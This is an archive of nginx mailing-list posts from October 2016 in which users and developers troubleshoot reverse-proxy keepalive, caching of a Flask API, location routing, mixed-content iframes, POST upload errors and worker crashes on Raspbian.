From emailgrant at gmail.com Sat Oct 1 01:15:17 2016
From: emailgrant at gmail.com (Grant)
Date: Fri, 30 Sep 2016 18:15:17 -0700
Subject: keepalive upstream
Message-ID:

I've been struggling with a very difficult-to-diagnose problem when using apache2 and Odoo in a reverse proxy configuration with nginx. Enabling keepalive for upstream in nginx seems to have fixed it. Why is it not enabled upstream by default as it is downstream?

- Grant

From nginx-forum at forum.nginx.org Sat Oct 1 23:08:44 2016
From: nginx-forum at forum.nginx.org (spacerobot)
Date: Sat, 01 Oct 2016 19:08:44 -0400
Subject: Parse response body and return status code/body based on it
Message-ID: <3b878897f142802dbca2cc440c50a7a7.NginxMailingListEnglish@forum.nginx.org>

Hi nginx experts,

I'm trying to achieve a mechanism where, for requests to certain endpoints, nginx makes an HTTP call to a certain server (mostly POST and DELETE), gets a response back, parses the response code and body, and, based on the response code and the content of the response body, returns certain HTTP status codes/responses to the caller. Is there an existing module that can help achieve this?

Thanks in advance!

Posted at Nginx Forum: https://forum.nginx.org/read.php?2,270012,270012#msg-270012

From francis at daoine.org Sun Oct 2 10:07:09 2016
From: francis at daoine.org (Francis Daly)
Date: Sun, 2 Oct 2016 11:07:09 +0100
Subject: location query string?
In-Reply-To:
References: <20160929213233.GE11677@daoine.org>
Message-ID: <20161002100709.GH11677@daoine.org>

On Fri, Sep 30, 2016 at 04:27:49AM -0700, Grant wrote:

Hi there,

> > I'm not quite sure what the specific problem you are seeing is, from
> > the previous mails.

> > Might the problem be related to your upstream not cleanly
> > closing the connections?
>
> It sure could be. Would this be a good way to monitor that possibility:
>
> netstat -ant | awk '{print $6}' | sort | uniq -c | sort -n

That could indicate when the number of tcp connections in various states changes; it may be a good starting point for finding the cause of the problem.

nginx makes an http request of upstream; it expects an http response. If the tcp connection and the http connection are staying open longer than necessary, that suggests that either the client (nginx) or the server (upstream) is doing something wrong.

Can you make the same request manually of upstream, and see if there is any indication of things not being as they should?

Is there any difference between an http/1.0 and an http/1.1 request to upstream? Or if the response includes a Content-Length header or is chunked? Or any other things that are different between the "working" and "not-working" cases?

Your later mail suggests that "Keepalive" is involved somehow. If you are still keen to investigate -- can you see that nginx does something wrong when Keepalive is or is not set? Or does upstream do something wrong when Keepalive is or is not set? (If there is an nginx problem, I suspect that people will be interested in fixing it. If there is an upstream problem, then possibly people there will be interested in fixing it, or possibly a workaround can be provided on the nginx side.)
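As a minimal sketch of that kind of manual test (assuming, for illustration only, that the upstream listens on 127.0.0.1:8080 -- adjust the host, port and URI to your setup):

# an HTTP/1.0 request, roughly what nginx sends to upstream by default
curl -v --http1.0 -H 'Connection: close' http://127.0.0.1:8080/some/uri -o /dev/null

# an HTTP/1.1 request, closer to what nginx sends with upstream keepalive enabled
curl -v --http1.1 http://127.0.0.1:8080/some/uri -o /dev/null

Then compare whether each response carries a Content-Length or Transfer-Encoding: chunked header, and whether the server closes the connection once the response is complete.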
Cheers,

f
-- 
Francis Daly        francis at daoine.org

From francis at daoine.org Sun Oct 2 10:18:03 2016
From: francis at daoine.org (Francis Daly)
Date: Sun, 2 Oct 2016 11:18:03 +0100
Subject: Parse response body and return status code/body based on it
In-Reply-To: <3b878897f142802dbca2cc440c50a7a7.NginxMailingListEnglish@forum.nginx.org>
References: <3b878897f142802dbca2cc440c50a7a7.NginxMailingListEnglish@forum.nginx.org>
Message-ID: <20161002101803.GI11677@daoine.org>

On Sat, Oct 01, 2016 at 07:08:44PM -0400, spacerobot wrote:

Hi there,

> I'm trying to achieve a mechanism where, for requests to certain endpoints,
> nginx makes an HTTP call to a certain server (mostly POST and DELETE), gets a
> response back, parses the response code and body, and, based on the response
> code and the content of the response body, returns certain HTTP status
> codes/responses to the caller. Is there an existing module that can help
> achieve this?

That sounds like you want a very specific set of things to happen. It is unlikely that that exact set of things is already in a dedicated module.

I suspect that you will find it easiest to start by using one of the embedded-language modules and writing your logic in that language -- lua, perl, and a version of javascript are available; probably more are too.

(If there are specific things that you need, such as issuing an http DELETE to another url, you will want to confirm that the facility to do that is available in the language that you choose to use.)
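As a rough illustration of the embedded-language approach -- this sketch assumes the third-party lua module (ngx_http_lua_module, as bundled with OpenResty) is compiled in, and the location names, upstream host and response-body check are invented for the example:

location = /api/endpoint {
    content_by_lua_block {
        -- subrequest to the internal location that proxies the other server
        local res = ngx.location.capture("/remote", { method = ngx.HTTP_POST })

        -- decide what to send to the caller based on upstream status and body
        if res.status == 200 and string.find(res.body, '"ok"', 1, true) then
            ngx.status = 204
            return ngx.exit(204)
        end

        ngx.status = 502
        ngx.say("unexpected answer from the remote server")
    }
}

location = /remote {
    internal;
    proxy_pass http://remote.example.com/;
}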
Good luck with it,

f
-- 
Francis Daly        francis at daoine.org

From zxcvbn4038 at gmail.com Mon Oct 3 03:16:09 2016
From: zxcvbn4038 at gmail.com (CJ Ess)
Date: Sun, 2 Oct 2016 23:16:09 -0400
Subject: ngx_brotli
In-Reply-To:
References:
Message-ID:

The clients will send an "Accept-Encoding" header which includes "br" as one of the accepted types; that will trigger the module if it's configured. It has a set of directives similar to the gzip module, so you'll need to set those. I think I see brotli support mostly from Chrome on Android.

On Thu, Sep 29, 2016 at 11:22 PM, Dewangga Bachrul Alam <dewanggaba at xtremenitro.org> wrote:

> Hello!
>
> Is there any best practice or some example to see how brotli
> compression works? I've patched nginx using ngx_brotli[1], but I
> didn't see any brotli header, there's only gzip.
>
> Many thanks.
>
> [1] https://github.com/cloudflare/ngx_brotli_module

From bhadauria.nitin at gmail.com Mon Oct 3 09:13:16 2016
From: bhadauria.nitin at gmail.com (nitin bhadauria)
Date: Mon, 3 Oct 2016 14:43:16 +0530
Subject: Rate limit per day
Message-ID:

Hello Team,

Is it possible to use the module ngx_http_limit_req_module to rate limit requests per day?

Regards,
Nitin B.

From tseveendorj at gmail.com Mon Oct 3 10:28:19 2016
From: tseveendorj at gmail.com (Tseveendorj Ochirlantuu)
Date: Mon, 3 Oct 2016 18:28:19 +0800
Subject: specific to index.php rest of them index.html
Message-ID:

Hello,

I need to configure some locations to go to index.php and the rest to go to index.html.

if ($request_uri !~ ^/(location1|location2|location3)$ ) {
    rewrite ^(.*) /index.html;
}

but how do I write the "else"?

If the request contains location1, location2 or location3 it should go to fastcgi_pass 127.0.0.1:9000; if not, it should go to /index.html.

regards,
tseveen

From r1ch+nginx at teamliquid.net Mon Oct 3 12:40:19 2016
From: r1ch+nginx at teamliquid.net (Richard Stanway)
Date: Mon, 3 Oct 2016 14:40:19 +0200
Subject: specific to index.php rest of them index.html
In-Reply-To:
References:
Message-ID:

Why not use the location directive? This is what it is designed for.

http://nginx.org/en/docs/http/ngx_http_core_module.html#location
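For example, a minimal sketch of that approach (the location names and the fastcgi address are taken from your mail; routing everything matched to index.php is an assumption):

location ~ ^/(location1|location2|location3)$ {
    include fastcgi_params;
    fastcgi_param SCRIPT_FILENAME $document_root/index.php;
    fastcgi_pass 127.0.0.1:9000;
}

location / {
    # everything else falls back to the static page
    try_files $uri /index.html;
}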
On Mon, Oct 3, 2016 at 12:28 PM, Tseveendorj Ochirlantuu <tseveendorj at gmail.com> wrote:

> I need to configure some locations to go to index.php and the rest to go
> to index.html.
>
> [...]

From tseveendorj at gmail.com Mon Oct 3 13:53:06 2016
From: tseveendorj at gmail.com (Tseveendorj Ochirlantuu)
Date: Mon, 3 Oct 2016 21:53:06 +0800
Subject: specific to index.php rest of them index.html
In-Reply-To:
References:
Message-ID:

This is for a symfony2 project.

location ~ /location1 {
    fastcgi things;
}

location ~ /location2 {
    fastcgi things;
}

location ~ /location3 {
    fastcgi things;
}

location / {
    index index.html;
}

How do the examples above fit the symfony2 config below? Mine is:

# dev
location ~ ^(app_dev|config)\.php$ {
    fastcgi things;
}

# prod
location ~ ^app.php {
    fastcgi things;
}

location ~ \.php {
    deny all;
}

location / {
    try_files;
}

On Mon, Oct 3, 2016 at 8:40 PM, Richard Stanway wrote:

> Why not use the location directive? This is what it is designed for.
>
> http://nginx.org/en/docs/http/ngx_http_core_module.html#location

From pcgeopc at gmail.com Mon Oct 3 13:58:04 2016
From: pcgeopc at gmail.com (Geo P.C.)
Date: Mon, 3 Oct 2016 19:28:04 +0530
Subject: URL is not pointing to https on iframe
Message-ID:

In our site we are loading a calendar api function that works on http (cdn.instantcal.com).
While loading this site on our wordpress site over https it's not working, and we get an error:

"Mixed Content: The page at 'https://www.geo.com/wp-admin/post.php?post=362&action=edit' was loaded over HTTPS, but requested an insecure resource 'http://cdn.instantcal.com/cvj.html'. This request has been blocked; the content must be served over HTTPS."

In order to fix the mixed-content iframe issue in our Nginx proxy server, we configured a new https site calendar.geopc.com that proxies to cdn.instantcal.com:

server {
    listen 443;
    server_name calendar.geopc.com;
    location / {
        proxy_pass http://cdn.instantcal.com;
        proxy_set_header Host cdn.instantcal.com;
        proxy_set_header X-Real-IP $remote_addr;
    }
}

Then in the iframe we set the url as

But in the iframe we are getting the same error:

Mixed Content: The page at 'https://www.geo.com/wp-admin/post.php?post=362&action=edit' was loaded over HTTPS, but requested an insecure resource 'http://calendar.geopc.com/cvj.html?idcloseable=0&gnavigable=1&gperiod=da'. This request has been blocked; the content must be served over HTTPS.

When we directly access the url calendar.geopc.com over https it works fine. But please let me know what the issue is: is it in the iframe or in Nginx? Can anyone please help us?

From medvedev.yp at gmail.com Mon Oct 3 14:02:54 2016
From: medvedev.yp at gmail.com (Yuriy Medvedev)
Date: Mon, 3 Oct 2016 17:02:54 +0300
Subject: URL is not pointing to https on iframe
In-Reply-To:
References:
Message-ID:

Hi, please use $scheme:

proxy_set_header X-Forwarded-Proto $scheme;

2016-10-03 16:58 GMT+03:00 Geo P.C.:

> In our site we are loading a calendar api function that works on http
> (cdn.instantcal.com). [...]

From nginx-forum at forum.nginx.org Mon Oct 3 15:04:39 2016
From: nginx-forum at forum.nginx.org (smaig)
Date: Mon, 03 Oct 2016 11:04:39 -0400
Subject: nginx worker process exited on signal 7
Message-ID: <16953dca81ce317c3c3dcd98cf0cb4a8.NginxMailingListEnglish@forum.nginx.org>

Hello team,

I've followed this tutorial (https://www.c-rieger.de/nextcloud-installation-guide/) to configure nginx for nextcloud on a raspberry pi 3, but using Raspbian OS instead of Ubuntu.

I guess the only specific thing in this installation is that we used "ngx_cache_purge-2.3" args to compile nginx 1.11.4:

...
COMMON_CONFIGURE_ARGS := \
...
--with-ld-opt="$(LDFLAGS)" \ --add-module="$(CURDIR)/debian/modules/ngx_cache_purge-2.3" In one case, everything is working using those configuration files : nginx.conf : http://pastebin.com/KnpAFm3h nextcloud.conf.https : http://pastebin.com/ZzDy9puJ nginx/error.log (debug level): 2016/10/01 11:12:15 [notice] 14944#14944: built by gcc 4.9.2 (Raspbian 4.9.2-10) 2016/10/01 11:12:15 [notice] 14944#14944: OS: Linux 4.4.21-v7+ 2016/10/01 11:12:15 [notice] 14944#14944: getrlimit(RLIMIT_NOFILE): 1024:4096 2016/10/01 11:12:15 [notice] 14945#14945: start worker processes 2016/10/01 11:12:15 [notice] 14945#14945: start worker process 14946 2016/10/01 11:12:15 [notice] 14945#14945: start worker process 14947 2016/10/01 11:12:15 [notice] 14945#14945: start worker process 14948 2016/10/01 11:12:15 [notice] 14945#14945: start worker process 14949 2016/10/01 11:12:15 [notice] 14945#14945: start cache manager process 14950 2016/10/01 11:12:15 [notice] 14945#14945: start cache loader process 14951 2016/10/01 11:12:28 [notice] 14949#14949: *1 "^" matches "/", client: 1.2.3.4, server: mycloud.dyndns.org, request: "GET / HTTP/1.1", host: "mycloud.dyndns.org" 2016/10/01 11:12:28 [notice] 14949#14949: *1 rewritten data: "/index.php/", args: "", client: 1.2.3.4, server: mycloud.dyndns.org, request: "GET / HTTP/1.1", host: "mycloud.dyndns.org" 2016/10/01 11:12:28 [notice] 14949#14949: *1 "^" matches "/apps/files/", client: 1.2.3.4, server: mycloud.dyndns.org, request: "GET /apps/files/ HTTP/1.1", host: "mycloud.dyndns.org" 2016/10/01 11:12:28 [notice] 14949#14949: *1 rewritten data: "/index.php/apps/files/", args: "", client: 1.2.3.4, server: mycloud.dyndns.org, request: "GET /apps/files/ HTTP/1.1", host: "mycloud.dyndns.org" 2016/10/01 11:12:31 [notice] 14947#14947: *12 "^" matches "/apps/encryption/ajax/getStatus", client: 1.2.3.4, server: mycloud.dyndns.org, request: "GET /apps/encryption/ajax/getStatus HTTP/1.1", host: "mycloud.dyndns.org" 2016/10/01 11:12:31 [notice] 14947#14947: *12 rewritten data: "/index.php/apps/encryption/ajax/getStatus", args: "", client: 1.2.3.4, server: mycloud.dyndns.org, request: "GET /apps/encryption/ajax/getStatus HTTP/1.1", host: "mycloud.dyndns.org" In another one, it's not working with those configuration files : nginx.conf : http://pastebin.com/Yyuk7ki2 gateway.conf : http://pastebin.com/P4Kzdt41 nextcloud.conf : http://pastebin.com/6ySjAHGB nginx/error.log: 2016/10/01 11:13:38 [notice] 14975#14975: built by gcc 4.9.2 (Raspbian 4.9.2-10) 2016/10/01 11:13:38 [notice] 14975#14975: OS: Linux 4.4.21-v7+ 2016/10/01 11:13:38 [notice] 14975#14975: getrlimit(RLIMIT_NOFILE): 1024:4096 2016/10/01 11:13:38 [notice] 14976#14976: start worker processes 2016/10/01 11:13:38 [notice] 14976#14976: start worker process 14977 2016/10/01 11:13:38 [notice] 14976#14976: start worker process 14978 2016/10/01 11:13:38 [notice] 14976#14976: start worker process 14979 2016/10/01 11:13:38 [notice] 14976#14976: start worker process 14980 2016/10/01 11:13:38 [notice] 14976#14976: start cache manager process 14981 2016/10/01 11:13:38 [notice] 14976#14976: start cache loader process 14982 2016/10/01 11:13:48 [notice] 14977#14977: *1 "^" matches "/", client: 1.2.3.4, server: mycloud.dyndns.org, request: "GET / HTTP/1.1", host: "mycloud.dyndns.org" 2016/10/01 11:13:48 [notice] 14977#14977: *1 rewritten data: "/nextcloud", args: "", client: 1.2.3.4, server: mycloud.dyndns.org, request: "GET / HTTP/1.1", host: "mycloud.dyndns.org" 2016/10/01 11:13:48 [notice] 14978#14978: *5 "^" matches "/nextcloud", client: 
127.0.0.1, server: 127.0.0.1, request: "GET /nextcloud HTTP/1.1", host: "mycloud.dyndns.org" 2016/10/01 11:13:48 [notice] 14978#14978: *5 rewritten data: "/nextcloud/index.php/nextcloud", args: "", client: 127.0.0.1, server: 127.0.0.1, request: "GET /nextcloud HTTP/1.1", host: "mycloud.dyndns.org" 2016/10/01 11:13:48 [info] 14978#14978: *5 client 127.0.0.1 closed keepalive connection 2016/10/01 11:13:48 [notice] 14976#14976: signal 17 (SIGCHLD) received 2016/10/01 11:13:48 [alert] 14976#14976: worker process 14977 exited on signal 7 2016/10/01 11:13:48 [notice] 14976#14976: start worker process 14984 2016/10/01 11:13:48 [notice] 14976#14976: signal 29 (SIGIO) received 2016/10/01 11:13:48 [notice] 14980#14980: *7 "^" matches "/", client: 1.2.3.4, server: mycloud.dyndns.org, request: "GET / HTTP/1.1", host: "mycloud.dyndns.org" 2016/10/01 11:13:48 [notice] 14980#14980: *7 rewritten data: "/nextcloud", args: "", client: 1.2.3.4, server: mycloud.dyndns.org, request: "GET / HTTP/1.1", host: "mycloud.dyndns.org" 2016/10/01 11:13:48 [notice] 14978#14978: *11 "^" matches "/nextcloud", client: 127.0.0.1, server: 127.0.0.1, request: "GET /nextcloud HTTP/1.1", host: "mycloud.dyndns.org" 2016/10/01 11:13:48 [notice] 14978#14978: *11 rewritten data: "/nextcloud/index.php/nextcloud", args: "", client: 127.0.0.1, server: 127.0.0.1, request: "GET /nextcloud HTTP/1.1", host: "mycloud.dyndns.org" 2016/10/01 11:13:48 [info] 14978#14978: *11 client 127.0.0.1 closed keepalive connection 2016/10/01 11:13:48 [notice] 14976#14976: signal 17 (SIGCHLD) received 2016/10/01 11:13:48 [alert] 14976#14976: worker process 14980 exited on signal 7 2016/10/01 11:13:48 [notice] 14976#14976: start worker process 14985 2016/10/01 11:13:48 [notice] 14976#14976: signal 29 (SIGIO) received 2016/10/01 11:13:54 [notice] 14978#14978: *13 "^" matches "/", client: 1.2.3.4, server: mycloud.dyndns.org, request: "GET / HTTP/1.1", host: "mycloud.dyndns.org" 2016/10/01 11:13:54 [notice] 14978#14978: *13 rewritten data: "/nextcloud", args: "", client: 1.2.3.4, server: mycloud.dyndns.org, request: "GET / HTTP/1.1", host: "mycloud.dyndns.org" 2016/10/01 11:13:54 [notice] 14984#14984: *17 "^" matches "/nextcloud", client: 127.0.0.1, server: 127.0.0.1, request: "GET /nextcloud HTTP/1.1", host: "mycloud.dyndns.org" 2016/10/01 11:13:54 [notice] 14984#14984: *17 rewritten data: "/nextcloud/index.php/nextcloud", args: "", client: 127.0.0.1, server: 127.0.0.1, request: "GET /nextcloud HTTP/1.1", host: "mycloud.dyndns.org" 2016/10/01 11:13:54 [info] 14984#14984: *17 client 127.0.0.1 closed keepalive connection 2016/10/01 11:13:54 [notice] 14976#14976: signal 17 (SIGCHLD) received 2016/10/01 11:13:54 [alert] 14976#14976: worker process 14978 exited on signal 7 2016/10/01 11:13:54 [notice] 14976#14976: start worker process 14986 2016/10/01 11:13:54 [notice] 14976#14976: signal 29 (SIGIO) received The author of the installation guide i've followed tried to help me on nextcloud forum and used my configuration file on his own ubuntu server without any issue... So, question is, why it's not working on my raspbian os with exactly the same config file ? 
(except domain)

Regards,

Posted at Nginx Forum: https://forum.nginx.org/read.php?2,270043,270043#msg-270043

From mdounin at mdounin.ru Mon Oct 3 15:13:13 2016
From: mdounin at mdounin.ru (Maxim Dounin)
Date: Mon, 3 Oct 2016 18:13:13 +0300
Subject: nginx worker process exited on signal 7
In-Reply-To: <16953dca81ce317c3c3dcd98cf0cb4a8.NginxMailingListEnglish@forum.nginx.org>
References: <16953dca81ce317c3c3dcd98cf0cb4a8.NginxMailingListEnglish@forum.nginx.org>
Message-ID: <20161003151313.GE73038@mdounin.ru>

Hello!

On Mon, Oct 03, 2016 at 11:04:39AM -0400, smaig wrote:

> I've followed this tutorial (https://www.c-rieger.de/nextcloud-installation-guide/)
> to configure nginx for nextcloud on a raspberry pi 3, but using Raspbian OS
> instead of Ubuntu.
>
> I guess the only specific thing in this installation is that we used
> "ngx_cache_purge-2.3" args to compile nginx 1.11.4:
>
> ...
> COMMON_CONFIGURE_ARGS := \
> ...
> --with-ld-opt="$(LDFLAGS)" \
> --add-module="$(CURDIR)/debian/modules/ngx_cache_purge-2.3"
>
> In one case, everything is working using these configuration files:
>
> nginx.conf : http://pastebin.com/KnpAFm3h
> nextcloud.conf.https : http://pastebin.com/ZzDy9puJ
>
> nginx/error.log (debug level):
>
> 2016/10/01 11:12:15 [notice] 14944#14944: built by gcc 4.9.2 (Raspbian
> 4.9.2-10)
> 2016/10/01 11:12:15 [notice] 14944#14944: OS: Linux 4.4.21-v7+

Start with checking your optimization flags. GCC as shipped in Raspbian (Raspbian 4.9.2-10) is known to produce broken code at the -O2 optimization level, see details here:

https://trac.nginx.org/nginx/ticket/912

[...]

-- 
Maxim Dounin
http://nginx.org/

From itsawesome.yes at gmail.com Tue Oct 4 15:17:38 2016
From: itsawesome.yes at gmail.com (Luigi Assom)
Date: Tue, 4 Oct 2016 17:17:38 +0200
Subject: cache all endpoints but one: nginx settings
Message-ID:

Hello,

I have a flask web app + uwsgi + nginx. I am using nginx both as a server and as a proxy server.

How do I make nginx cache successful results from all API endpoints but one?

I want to cache only successful responses from all /api/ endpoints except /api/search.

1. I tried to:
-- add a new location (see api/search) to the proxy server to proxy_pass the request to the default server;
-- put all other /api/ location blocks with cache settings after the /api/search location.

It seems not to cache as I want (it is caching everything).

2. I designed my webapps like this (see mockup in attachment):
-- one api returns a page; if the page is not found, it returns a json-formatted warning '{warning : not found'}
-- one template handles 404 missing pages.

That is to say, while example.com/api/mockup will return a result (200 response), example/mockup will return a 404 response.

In case a page is not found, will nginx cache the api result or not, given my current settings?

Could you clarify how flask, uwsgi and the nginx server (port 8000) and nginx proxy server (port 80) are interacting in such a case, given my settings?

Please see in the attachment the blocks from my nginx settings. Uwsgi settings are below.

*** UWSGI # settings in myapp.ini ***

[uwsgi]
module = wsgi
master = true
processes = 5
socket = awesome3.sock
chmod-socket = 660
vacuum = true
die-on-term = true
logto = /var/log/uwsgi/%n.log
protocol = uwsgi
harakiri = 120

***

Thank you so much for helping out!
-------------- next part --------------
server {
    listen 8000 default_server;
    server_name example.com;
    charset utf-8;
    root /var/www/example;

    location / {
        include uwsgi_params;
        uwsgi_pass unix:/var/www/awesome3-gamma/awesome3.sock;
    }

    # Set Cache for my Json api
    # I DO NOT WANT TO CACHE /api/search !!!!
    # I let expires 1M for json responses, and try with proxy_pass
    # as https://groups.google.com/forum/embed/#!topic/openresty-en/apyaHbqJetU
    location ~* \.(?:json)$ {
        expires 1M;
        access_log off;
        add_header Cache-Control "public";
    }

    location /api {
        include uwsgi_params;
        uwsgi_pass unix:/var/www/awesome3-gamma/awesome3.sock;
        allow XX.XX.XXX.XXX:;
        deny all;
    }
}

# Set cache dir for nginx
proxy_cache_path /tmp/nginx levels=1:2 keys_zone=my_zone:10m inactive=60m;
proxy_cache_key "$scheme$request_method$host$request_uri";

# Attempt to delete single file cache - skip it
# http://serverfault.com/questions/493411/how-to-delete-single-nginx-cache-file
# curl -s -o /dev/null -H "X-Update: 1" mydomain.com
# proxy_cache_bypass $http_x_update;

# Here I set a proxy server:
# I try to proxy_pass /api/search
# with no cache settings

# Virtualhost/server configuration
server {
    listen 80 default_server;
    server_name example.com;
    root /var/www/example;
    charset utf-8;

    location /api/search {
        proxy_pass http://example:8000/api/search;
    }

    # can cache my API won't change
    location /api {
        add_header X-Proxy-Cache $upstream_cache_status;
        proxy_cache my_zone;
        proxy_cache_use_stale updating;
        proxy_cache_lock on;
        # proxy_cache_valid any 30s;
        proxy_cache_valid 30d;
        proxy_ignore_headers X-Accel-Expires Expires Cache-Control;
        proxy_pass http://example.com:8000/api;
    }
}

# like this, in my browser I still see all api requests as
# add_header Cache-Control "no-cache, must-revalidate, max-age=0";

-------------- next part --------------
A non-text attachment was scrubbed...
Name: myapp.py
Type: text/x-python-script
Size: 1034 bytes
Desc: not available
URL:

From mdounin at mdounin.ru Tue Oct 4 16:28:25 2016
From: mdounin at mdounin.ru (Maxim Dounin)
Date: Tue, 4 Oct 2016 19:28:25 +0300
Subject: cache all endpoints but one: nginx settings
In-Reply-To:
References:
Message-ID: <20161004162825.GM73038@mdounin.ru>

Hello!

On Tue, Oct 04, 2016 at 05:17:38PM +0200, Luigi Assom wrote:

> I have a flask web app + uwsgi + nginx.
> I am using nginx both as a server and as a proxy server.
>
> How do I make nginx cache successful results from all API endpoints
> but one?
>
> I want to cache only successful responses from all /api/ endpoints except
> /api/search.

Try this:

location /api/ {
    ... cache switched on here ...
}

location /api/search {
    ... cache off here ...
}

Alternatively, you can control response cacheability by returning appropriate headers (Cache-Control, Expires, X-Accel-Expires) from your backend. But given...

> 1. I tried to:
> -- add a new location (see api/search) to the proxy server to proxy_pass the
> request to the default server;
> -- put all other /api/ location blocks with cache settings after the
> /api/search location.
>
> It seems not to cache as I want (it is caching everything).

... it looks like your problem is elsewhere. That is, you either failed to apply configuration changes, or you are testing it wrong. Some tips:

- Make sure you've reloaded nginx configuration after changes, and the reload was successful (that is: check the error log). If unsure, stop nginx, make sure it is no longer responding, then start it again.

- Make sure to test with command-line tools like curl.
Browsers have their own caches, and it's very easy to confuse things even if you are an experienced web developer.

> 2. I designed my webapps like this (see mockup in attachment):
> -- one api returns a page; if the page is not found, it returns a
> json-formatted warning '{warning : not found'}
> -- one template handles 404 missing pages.
>
> That is to say, while
> example.com/api/mockup will return a result (200 response)
> example/mockup will return a 404 response
>
> In case a page is not found, will nginx cache the api result or not, given
> my current settings?
>
> Could you clarify how flask, uwsgi and the nginx server (port 8000) and
> nginx proxy server (port 80) are interacting in such a case, given my
> settings?

From your python code it looks like you return 200 on errors, at least in case of errors in mockup_template(). As far as I understand from http://flask.pocoo.org/docs/0.11/errorhandling/#error-handlers, you should use abort(404) to return a proper 404 error to nginx.

With 200 returned in all cases it will be non-trivial to do anything on the nginx side if you want to cache some 200 responses, but not others. Once you change your code to properly return 404, you can selectively control what to cache using the proxy_cache_valid directive, see http://nginx.org/r/proxy_cache_valid.

-- 
Maxim Dounin
http://nginx.org/

From emailgrant at gmail.com Tue Oct 4 17:12:07 2016
From: emailgrant at gmail.com (Grant)
Date: Tue, 4 Oct 2016 10:12:07 -0700
Subject: location query string?
In-Reply-To: <20161002100709.GH11677@daoine.org>
References: <20160929213233.GE11677@daoine.org> <20161002100709.GH11677@daoine.org>
Message-ID:

> > Might the problem be related to your upstream not cleanly
> > closing the connections?
>
> It sure could be. Would this be a good way to monitor that possibility:
>
> netstat -ant | awk '{print $6}' | sort | uniq -c | sort -n

[...]

> Your later mail suggests that "Keepalive" is involved somehow. If you
> are still keen to investigate -- can you see that nginx does something
> wrong when Keepalive is or is not set? Or does upstream do something
> wrong when Keepalive is or is not set? (If there is an nginx problem,
> I suspect that people will be interested in fixing it. If there is an
> upstream problem, then possibly people there will be interested in fixing
> it, or possibly a workaround can be provided on the nginx side.)

Admittedly this is over my head. I would be happy to test and probe if anyone is interested enough to tell me what to do.
- Grant

From nginx-forum at forum.nginx.org Tue Oct 4 19:28:18 2016
From: nginx-forum at forum.nginx.org (yurai)
Date: Tue, 04 Oct 2016 15:28:18 -0400
Subject: Clientbodyinfileonly - POST request is discarded
Message-ID: <7598f715feca4d51b9a9d738bd221c68.NginxMailingListEnglish@forum.nginx.org>

Hello Nginx community,

I am trying to perform a big file upload on my Nginx server, based on the instructions at https://coderwall.com/p/swgfvw/nginx-direct-file-upload-without-passing-them-through-backend

Unfortunately I get an "HTTP/1.1 405 Not Allowed" error code all the time.

1. My minimal configuration:

worker_processes 1;

events {
    worker_connections 1024;
}

http {
    include /etc/nginx/mime.types;
    default_type application/octet-stream;
    sendfile on;
    tcp_nopush on;
    tcp_nodelay on;
    types_hash_max_size 2048;
    keepalive_timeout 65;
    client_body_temp_path /tmp/nginx-client-body;

    server {
        listen 80;
        server_name s1;

        location /upload {
            #auth_basic "Restricted Upload";
            #auth_basic_user_file basic.htpasswd;
            client_body_temp_path /tmp/;
            client_body_in_file_only on;
            client_body_buffer_size 128K;
            client_max_body_size 1000M;
            proxy_pass_request_headers on;
            proxy_set_header X-FILE $request_body_file;
            proxy_set_body off;
            proxy_redirect off;
            proxy_pass http://127.0.0.1:8080/upload.txt;
        }
    }

    server {
        listen 8080;
        server_name s2;

        location / {
            root /usr/share/nginx/html/foo/bar;
            autoindex on;
        }
    }
}

2. GET works as expected:

curl -i http://localhost/upload
HTTP/1.1 200 OK
Server: nginx/1.11.4
Date: Tue, 04 Oct 2016 19:05:42 GMT
Content-Type: text/plain
Content-Length: 4
Connection: keep-alive
Last-Modified: Tue, 04 Oct 2016 18:44:59 GMT
ETag: "57f3f8ab-4"
Accept-Ranges: bytes

abc

It's OK - the file upload.txt has "abc" content.

3. Unfortunately POST does not work:

curl --data-binary upload.txt http://localhost/upload

405 Not Allowed


nginx/1.11.4
I checked file content (actual request body) buffered in /tmp and it contains expected file name ("upload.txt"). When I comment out auth_basic* directives in above config for both cases (for GET and POST) I get "401 Authorization Required". What did I miss? Posted at Nginx Forum: https://forum.nginx.org/read.php?2,270063,270063#msg-270063 From francis at daoine.org Tue Oct 4 19:46:42 2016 From: francis at daoine.org (Francis Daly) Date: Tue, 4 Oct 2016 20:46:42 +0100 Subject: Clientbodyinfileonly - POST request is discarded In-Reply-To: <7598f715feca4d51b9a9d738bd221c68.NginxMailingListEnglish@forum.nginx.org> References: <7598f715feca4d51b9a9d738bd221c68.NginxMailingListEnglish@forum.nginx.org> Message-ID: <20161004194642.GK11677@daoine.org> On Tue, Oct 04, 2016 at 03:28:18PM -0400, yurai wrote: Hi there, > Unfortunately I get "HTTP/1.1 405 Not Allowed" error code all the time. The "back-end" thing that you POST to must be able to handle the POST. Right now, you just ask nginx to serve a file from the filesystem, which does not accept a POST (by default). > location / { > root /usr/share/nginx/html/foo/bar; > autoindex on; > } Add something like return 200 "Do something sensible with $http_x_file\n"; in there and you'll see that it does work. And then decide what you actually want to do with the file, and make something do that. Good luck with it, f -- Francis Daly francis at daoine.org From justinbeech at gmail.com Wed Oct 5 03:29:32 2016 From: justinbeech at gmail.com (jb) Date: Wed, 5 Oct 2016 14:29:32 +1100 Subject: Safari gets network connection reset over https with very high speed connection Message-ID: Does anyone know how I can debug this issue? nginx (latest version and 1.9 too) running on iMac Safari running on macbook thunderbolt2 cable between the two of them. Any download of https file from nginx downloads random start part of the file then Safari reports in red "The network connection was lost". No other browser has an issue. Doesn't happen with http only https doesn't happen if the connection is throttled down to less than 400 megabit. Happens faster, the faster the connection is... Nothing in the nginx error log. I've reported the bug to Safari however from their response I believe they are not going to find the issue. Can anyone with a fast https connection - maybe to localhost - confirm this problem? Under Sierra and Safari 10. I don't know if the older version of Safari also had this. thanks -------------- next part -------------- An HTML attachment was scrubbed... URL: From francis at daoine.org Wed Oct 5 06:39:50 2016 From: francis at daoine.org (Francis Daly) Date: Wed, 5 Oct 2016 07:39:50 +0100 Subject: Rate limit per day In-Reply-To: References: Message-ID: <20161005063950.GM11677@daoine.org> On Mon, Oct 03, 2016 at 02:43:16PM +0530, nitin bhadauria wrote: Hi there, > Is it possible to use Module ngx_http_limit_req_module to rate limit > request / day ? No. (Unless the request rate is so high that it could also be expressed per minute.) The config interface only allows integer requests per second or per minute. The implementation seems to allow integer requests-per-thousand-seconds, but it's not immediately clear to me how exact that can be at low numbers. But if you wanted to play, minor patching could let you set values there, which could be of the order of hundreds of request per day. Perhaps that would work well enough for you? Otherwise, it looks like it would require significant patching to implement what you might want. 
Otherwise, it looks like it would require significant patching to implement what you might want. At that point, you may be better off with a different starting module.

Cheers,

f
